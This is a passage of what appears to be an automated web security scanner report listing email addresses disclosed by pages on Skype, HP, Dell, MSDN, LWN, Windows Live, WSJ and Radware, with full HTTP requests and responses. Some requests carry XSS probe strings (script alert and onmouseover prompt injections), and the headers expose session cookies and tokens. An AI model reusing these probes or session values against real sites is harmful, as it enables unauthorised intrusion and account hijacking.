Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:47 GMT; HttpOnly
Content-Length: 11000
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=65653
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...
<a href="mailto:SILKSupport@skype.net">SILKSupport@skype.net</a>
...[SNIP]...
<a href="mailto:SILKSupport@skype.net">SILKSupport@skype.net</a>
...[SNIP]...
<a href="mailto:SILKSupport@skype.net">SILKSupport@skype.net</a>
...[SNIP]...

20.64. https://developer.skype.com/support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /support

Issue detail

The following email address was disclosed in the response:

Request

GET /support HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:49 GMT
Server: Apache
ETag: "483ccd0d54f1b1c4a59a9f318d77c152"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:49 GMT; HttpOnly
Content-Length: 8414
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=52130
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...
<a href="mailto:access@developer.skype.com">access@developer.skype.com</a>
...[SNIP]...

20.65. https://developer.skype.com/support/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /support/

Issue detail

The following email address was disclosed in the response:

Request

GET /support/ HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:54 GMT
Server: Apache
ETag: "483ccd0d54f1b1c4a59a9f318d77c152"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:54 GMT; HttpOnly
Content-Length: 8414
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=24802
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...
<a href="mailto:access@developer.skype.com">access@developer.skype.com</a>
...[SNIP]...

20.66. http://h30187.www3.hp.com/resources/scripts/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/controls.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=604800
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 22:43:47 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 34880

// script.aculo.us controls.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

20.67. http://h30187.www3.hp.com/resources/scripts/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/dragdrop.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=604800
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 22:43:47 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 31174

// script.aculo.us dragdrop.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thro
...[SNIP]...

20.68. http://h30187.www3.hp.com/resources/scripts/widget/util.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/util.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/widget/util.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=604800
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 22:43:47 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
X-Nginx-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 68222

Powered.Util = Class.create();

Powered.Util.noenter = function (event) {
return !(event && event.which == 13);
};

Powered.Util.log = function(s) {
var logElem = document.getElementById('page
...[SNIP]...
Powered.setBackgroundLabels = function() {
/*
Function: Set default values of input elements. Get the default value from associated label having class="default-value"
Author: Lasse Bunk (lassebunk@gmail.com - http://lassebunk.dk)
Demo: http://lassebunk.dk/demos/default-values/
Version: 1.0
License: Use as you wish :-)
*/

$$("label.backgroundLabel").each(function(label) {

...[SNIP]...

20.69. http://heartbeat.skype.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://heartbeat.skype.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: heartbeat.skype.com
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Server: Apache/2.2.0 (Fedora)
Content-Type: text/html
Content-Length: 62603
Date: Sun, 04 Sep 2011 21:04:05 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Heartbe
...[SNIP]...
ntioned in our communications earlier this week, service refunds for numbers and inquiries regarding the service and number portability can be requested directly to Transit Telecom Customer Service at contato@transitbrasil.com.br or at their support number, 103 17 or (11) 3511-0200. We'll update the post as soon as we have further details.</p>
...[SNIP]...

20.70. http://i.dell.com/images/global/js/lib/jquery-1.2.2e.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.dell.com
Path:   /images/global/js/lib/jquery-1.2.2e.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /images/global/js/lib/jquery-1.2.2e.js HTTP/1.1
Host: i.dell.com
Proxy-Connection: keep-alive
Referer: http://search.dell.com/results.aspx?s=bsd&c=us&l=en&cs=04&k=xss&cat=all
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1; lwp=c=us&l=en&s=bsd&cs=04; mbox=check#true#1315153211|session#1315153150925-582363#1315155011|PC#1315153150925-582363.19#1316362754; s_cc=true; s_c49=c%3Dus%26l%3Den%26s%3Dbsd%26cs%3D04; gpv_pn=us%3Aen%3Absd%3A04%3Acategory%3Asecurity-network; e21=us-bsd%3A1317745155344; s_depth=1; sessionTime=Sun%20Sep%2004%202011%2011%3A19%3A15%20GMT-0500%20(Central%20Daylight%20Time); s_sq=%5B%5BB%5D%5D; s_sv_sid=985310046244; s_sv_112_p1=1@105@s/6782/6781/6780/6779/6757/6705/6704/6703/6702/6701/6700/6651/6650/6647/6638/6569/6561/6514/6566/6565&e/2; s_sv_112_s1=1@16@a//1315153156068; s_vi=[CS]v1|2731D26F05011FEE-4000010DE01961E7[CE]; bn_u=7520365768526576457; s_ppv=us%253Aen%253Absd%253A04%253Acategory%253Asecurity-network%2C41%2C41%2C910; bn_condition=us%7Cbsd%7Cd; cid=64824; lid=1652027; dgc=st; st=application%20security%20web; acd=s1cstli5s%2C13885348293%2C901qz26673; s_dl=1; s_channelstack=%5B%5B'st'%2C'1315153155412'%5D%2C%5B'st'%2C'1315153231779'%5D%5D; s_hwp=04%7C%7Cnull%7C%7C4%3A9%3A2011%3A11%3A20%7C%7CN%7C%7CN%7C%7Cnull%7C%7CNaN%7C%7Cnull%7C%7Cst%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; search_bn=us|bsd|SearchBaynoteEnabled.1; StormPCookie=bandwidth=NA; StormSCookie=bandwidth=NA

Response

HTTP/1.1 200 OK
Content-Length: 116547
Content-Type: application/x-javascript
Last-Modified: Fri, 21 Aug 2009 19:20:00 GMT
Accept-Ranges: bytes
ETag: "07052609422ca1:0"
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 16:19:57 GMT
Connection: close
Cache-Control: public, max-age=604800


/*
* jQuery 1.2.2 - New Wave Javascript
*
* Copyright (c) 2007 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date:
...[SNIP]...
<bhb@iceburg.net>
...[SNIP]...
ffsetHeight)/2)-this.sz(p,'borderTopWidth');s.left=l>0?(l+'px'):'0';s.top=t>0?(t+'px'):'0'},sz:function(el,p){return parseInt($.css(el,p))||0}}})(jQuery);


/* Copyright (c) 2007 Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* Ver
...[SNIP]...
strip.cloneNode(false);e.style.borderWidth='0 '+(opts[j+'R']?w:0)+'px 0 '+(opts[j+'L']?w:0)+'px';bot?d.appendChild(e):d.insertBefore(e,d.firstChild)}}})};


/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $Las
...[SNIP]...

20.71. http://i2.msdn.microsoft.com/Hash/8c37ae5af06d04795b740449553e275e.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i2.msdn.microsoft.com
Path:   /Hash/8c37ae5af06d04795b740449553e275e.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Hash/8c37ae5af06d04795b740449553e275e.js HTTP/1.1
Host: i2.msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/library/ms533897(v=vs.85).aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_NVR=0=/:1=en-us:2=en-us/library|en-us/evalcenter|en-us/security; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; TOptOut=1; ADS=SN=175A21EF

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=15552000
Content-Type: application/javascript
Last-Modified: Mon, 01 Aug 2011 10:14:58 GMT
Accept-Ranges: bytes
ETag: "747e15de3350cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 02:23:09 GMT
Content-Length: 106525
Connection: close

if(typeof MTPS==="undefined")MTPS={};MTPS.Utility={addListener:function(obj,eventName,listener){if(obj.addEventListener)obj.addEventListener(eventName,listener,false);else obj.attachEvent("on"+eventNa
...[SNIP]...
#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^
...[SNIP]...

20.72. http://lwn.net/Articles/456878/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lwn.net
Path:   /Articles/456878/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Articles/456878/ HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315138581.1; __utmz=196211505.1315138581.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:54:51 GMT
Server: Apache
Expires: -1
Content-Length: 18541
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>Red Hat alert RHSA-2011:1220-01 (samba3x) [LWN.net]</
...[SNIP]...
<td valign="top">bugzilla@redhat.com </td>
...[SNIP]...
<td valign="top">rhsa-announce@redhat.com, enterprise-watch-list@redhat.com </td>
...[SNIP]...
<td valign="top">&lt;201108291748.p7THmqjp013782@int-mx02.intmail.prod.int.phx2.redhat.com&gt;</td>
...[SNIP]...
</a>

8. Contact:

The Red Hat security contact is &lt;secalert@redhat.com&gt;. More contact
details at <a href="https://access.redhat.com/security/team/contact/">
...[SNIP]...

Version: GnuPG v1.4.4 (GNU/Linux)

iD8DBQFOW9D3XlSAg2UNWIIRAiBIAJ94bis53lBOuMQhqo71HAjqyqeDxgCfe1RE
zE9jl6cqN6/fOI58SZN2Q34=
=RDd4
-----END PGP SIGNATURE-----


--
Enterprise-watch-list mailing list
Enterprise-watch-list@redhat.com
<a href="https://www.redhat.com/mailman/listinfo/enterprise-watch-list">
...[SNIP]...

20.73. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lwn.net
Path:   /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E

Issue detail

The following email address was disclosed in the response:

Request

GET /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315187735.2; __utmz=196211505.1315187741.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=196211505.1.10.1315187741; __utmc=196211505

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 01:55:30 GMT
Server: Apache
Expires: -1
Content-Length: 4295
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a
href="mailto:lwn@lwn.net">
...[SNIP]...

20.74. https://mid.live.com/si/login.aspx/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mid.live.com
Path:   /si/login.aspx/x22

Issue detail

The following email address was disclosed in the response:

Request

GET /si/login.aspx/x22 HTTP/1.1
Host: mid.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2491
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: lc=en-US; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 04 Sep 2011 21:48:27 GMT
Connection: close

<html>
<head>
<title>Windows Live ID</title>
<meta name="MobileOptimized" content="100"/>
<link type="text/css" rel="stylesheet" href="/hig.css"/>
</head>
<body>
<form id="EmailPasswordForm" na
...[SNIP]...
<span class="SecondaryText">(example555@hotmail.com)</span>
...[SNIP]...

20.75. https://mid.live.com/si/login.aspx/x3c/cite/x3e/x3cspan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mid.live.com
Path:   /si/login.aspx/x3c/cite/x3e/x3cspan

Issue detail

The following email address was disclosed in the response:

Request

GET /si/login.aspx/x3c/cite/x3e/x3cspan HTTP/1.1
Host: mid.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2560
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: lc=en-US; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 04 Sep 2011 21:48:29 GMT
Connection: close

<html>
<head>
<title>Windows Live ID</title>
<meta name="MobileOptimized" content="100"/>
<link type="text/css" rel="stylesheet" href="/hig.css"/>
</head>
<body>
<form id="EmailPasswordForm" na
...[SNIP]...
<span class="SecondaryText">(example555@hotmail.com)</span>
...[SNIP]...

20.76. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424053111904900904576549933849920392.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:18 GMT
Server: Apache/2.0.64 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep05 - Sun 09/04/11 - 09:07:13 EDT
Cache-Control: max-age=15
Expires: Sun, 04 Sep 2011 16:17:33 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 191170
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a class="" href="mailto:alison.tudor@wsj.com">alison.tudor@wsj.com</a>
...[SNIP]...
<a href="#">TBD@wsj.com</a>
...[SNIP]...

20.77. http://radware.trk.sodoit.com/rts.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://radware.trk.sodoit.com
Path:   /rts.js

Issue detail

The following email address was disclosed in the response:

Request

GET /rts.js HTTP/1.1
Host: radware.trk.sodoit.com
Proxy-Connection: keep-alive
Referer: http://www.radware.com/Resources/AppWallSolution.aspx?source=google&9gtype=search&9gkw=web%20application%20security&9gad=8494610116.1&9gpla=&9gag=2157798556&gclid=CLjykYz_g6sCFQwaQgodAQy8yw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:57 GMT
Server: Apache/2.0.53 (Unix) mod_ssl/2.0.53 OpenSSL/0.9.7g
Vary: Host
Last-Modified: Tue, 30 Aug 2011 18:30:09 GMT
ETag: "3c6a-c98-338eae40"
Accept-Ranges: bytes
Content-Length: 3224
Connection: close
Content-Type: application/x-javascript

